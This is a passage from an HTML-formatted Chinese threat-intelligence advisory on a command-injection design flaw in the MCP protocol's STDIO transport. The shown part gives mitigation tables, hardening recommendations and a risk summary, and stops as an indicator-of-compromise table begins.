0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">具体建议</span></p></th></tr></thead><tbody><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">禁用STDIO</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">评估并切换至SSE或其他传输机制</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">输入验证</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">对所有MCP命令参数实施严格白名单过滤</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">权限控制</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">MCP服务器以最低权限账户运行</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">网络隔离</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">限制MCP服务器网络访问能力</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">日志审计</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">监控异常命令执行行为</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">依赖审查</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">检查项目MCP依赖是否存在已知漏洞</span></p></td></tr></tbody></table><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">中期加固方向</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">协议层面</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 推动MCP协议引入命令执行授权机制</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 实现命令参数的架构级清理</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 添加传输层认证和完整性校验</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">SDK层面</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 官方SDK应默认启用安全传输模式</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 提供安全配置指南和最佳实践</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 建立SDK安全更新响应机制</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">生态层面</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 建立MCP包安全审核机制</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 实现包签名和来源验证</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 推动MCP安全标准的行业共识</span></p></li></ul><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">长期战略建议</span></h3><ul style="list-style: circle;padding-left: 1em;margin-left: 0px;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"></ul><ol style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: none;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">1. </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">供应链安全审计</span></strong><span leaf="">：对AI基础设施依赖的第三方协议实施安全评估</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">2. </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">零信任集成</span></strong><span leaf="">：MCP交互纳入零信任安全框架</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">3. </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">威胁建模</span></strong><span leaf="">：针对AI应用场景进行专项威胁建模</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">4. </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">应急响应准备</span></strong><span leaf="">：建立AI供应链安全事件应急响应预案</span></p></li></ol><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结论</span></h2><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">MCP协议的STDIO设计缺陷是一个典型的</span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">系统性安全架构问题</span></strong><span leaf="">，而非单一产品漏洞。Anthropic拒绝从协议层面修复该缺陷的立场，使整个AI开发生态面临持续性供应链安全威胁。</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">关键风险点总结</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">架构缺陷</span></strong><span leaf="">：STDIO传输机制先天存在命令注入风险</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">规模庞大</span></strong><span leaf="">：20万+服务器、1.5亿+下载量构成重大攻击面</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">利用门槛低</span></strong><span leaf="">：脚本小子到APT组织均可利用</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">厂商推诿</span></strong><span leaf="">：Anthropic以&#34;预期行为&#34;为由拒绝担责</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">生态脆弱</span></strong><span leaf="">：MCP市场投毒可实现规模化供应链攻击</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心将持续跟踪该漏洞及相关威胁活动态势。建议所有使用MCP协议的企业和开发者立即评估风险暴露面，采取紧急缓解措施，并密切关注Anthropic后续安全公告。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">IOC指标</span></h2><table style="box-sizing: border-box;border-width: 0px;border-style: solid;border-color: inherit;border-image: initial;margin-top: 0px !important;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);text-indent: 0px;border-collapse: collapse;border-spacing: 0px;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><thead><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">类型</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 